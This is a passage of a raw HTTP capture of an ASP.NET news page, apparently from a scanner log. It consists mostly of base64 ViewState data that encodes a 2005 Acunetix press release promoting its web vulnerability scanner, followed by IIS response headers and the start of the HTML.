CAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo%2Bfii5vVAAhGyfGRVNk1&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLjj6S6DAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30642
Response Body - size: 30,642 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9u